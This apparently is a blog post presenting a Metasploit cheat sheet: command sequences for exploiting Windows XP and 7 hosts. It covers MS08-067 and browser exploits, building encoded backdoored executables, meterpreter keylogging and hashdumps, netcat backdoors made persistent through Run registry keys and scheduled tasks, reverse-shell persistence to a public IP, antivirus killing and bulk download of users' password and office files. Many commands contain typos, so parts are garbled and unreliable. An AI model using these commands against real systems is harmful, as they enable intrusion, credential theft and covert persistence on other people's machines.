METASPLOIT CHEAT-SHEET


METASPLOIT CHEAT-SHEET


Commands Only (Not for Script Kiddies):

1- Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1
set payload windows/vncinject/bind_tcp
exploit


2.Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.1.10
set LPORT 5555
exploit
ps
migrate 1880
cd c: ls
download program-7.exe /root
run killav
shell


3. Hacking By Metasploit . Windows xp Sp3 . With B14CK_B34RD
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.10
set RHOST 192.168.1.1
set payload windows/meterpreter/reverse_tcp
exploit


4.hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.10
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192.168.1.1
set RPORT 4321
show options
exploit


5. Metasploit --- Explotando vulnerabilidad en Windows 7
sudo nmap 192.168.---cek target dengan nmap------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1
set RPORT 445
run ----run the exploit


6. Metasploit backdooring
msf3#./msfpayloa windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R |./msfconsole -t
exe -x /tmp/kislay.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
root@b14ck# cd /tmp---->kislay.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
show options
exploit

Meterpretr>
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen


7. ms10 025 metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.1
exploit


8. IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/---enter
wait a few moments...


9. metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1
set LHOST 192.168.1.10
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:winntsystem32>dir


10.Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:WINDOWSSYSTEM32
meterpreter> reg enumkey -k HKLMsoftwareMicrosoftWindowsCureentVersionRun
meterpreter> reg setval -k HKLMsoftwareMicrosoftWindowsCureentVersionRun -v windows live -d "c:WINDOWSSYSTEM32netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLMsoftwareMicrosoftWindowsCureentVersionRun
meterpreter> reboot
bt~# nc 192.168.1.1 5555


11. BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer


12. ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:WINDOWSSYSTEM32

MORE Advanced Phun:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

____________________________________________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf


use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

________________________________________________________________________

# shows all the scripts
run [tab]

________________________________________________________________________

# persistence! broken ...if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30

________________________________________________________________________

run get_pidgin_creds

idletime
sysinfo

________________________________________________________________________

# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell

________________________________________________________________________

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITYSYSTEM"

________________________________________________________________________

# escalate to system
use priv
getsystem

________________________________________________________________________

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

________________________________________________________________________

# list top used apps
run prefetchtool -x 20
________________________________________________________________________
# list installed apps
run prefetchtool -p
________________________________________________________________________
run get_local_subnets
________________________________________________________________________
# find and download files
run search_dwld "%USERPROFILE%my documents" passwd
run search_dwld "%USERPROFILE%desktop passwd
run search_dwld "%USERPROFILE%my documents" office
run search_dwld "%USERPROFILE%desktop" office
________________________________________________________________________
# alternate
download -r "%USERPROFILE%desktop" ~/
download -r "%USERPROFILE%my documents" ~/
________________________________________________________________________
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
________________________________________________________________________

# does some run wmic commands etc
run winenum
________________________________________________________________________


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
________________________________________________________________________
# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
________________________________________________________________________
# vnc / port fwd for linux
run vnc
________________________________________________________________________
# priv esc
run kitrap0d

________________________________________________________________________

run getgui
________________________________________________________________________
# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock
_________________________________________________________________________
upload /tmp/system32.exe C:windowssystem32
reg enumkey -k HKLMsoftwaremicrosoftwindowscurrentversion run
reg setval -k HKLMsoftwaremicrosoftwindowscurrentversion run -v system32 -d "C:windowssystem32system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLMsoftwaremicrosoftwindowscurrentversion Run -v system32
reg enumkey -k HKLMsystemcontrolset001servicessharedaccess parametersfirewallpolicyStandardprofileaut horizedapplicationslist
reg setval -k HKLMsystemcontrolset001servicessharedaccess parametersfirewallpolicyStandardprofileaut horizedapplicationslist -v sys
reg queryval -k HKLMsystemcontrolset001servicessharedaccess parametersfirewallpolicyStandardprofileaut horizedapplicationslist -v system32
upload /neo/wallpaper1.bmp "C:documents and settingspentest3local settingsapplication datamicrosoft"

__________________________________________________________________________


getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
___________________________________________________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
___________________________________________________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
___________________________________________________________________________
getuid



enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

________________________________________________________________________
# Windows Login Brute Force Meterpreter Script
run winbf -h
________________________________________________________________________
# upload a script or executable and run it
uploadexec

________________________________________________________________________
# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionRun /v firewall /t REG_SZ /d "c:windowssystem32metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%metabkdr.exe" /ED 11/11/2011

_________________________________________________________________________

# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:Program FilesKasperskyavp.exe"
catchme.exe -E "c:Program FilesKasperskyavp.exe"
catchme.exe -O "c:Program FilesKasperskyavp.exe" dummy

No comments:

Post a Comment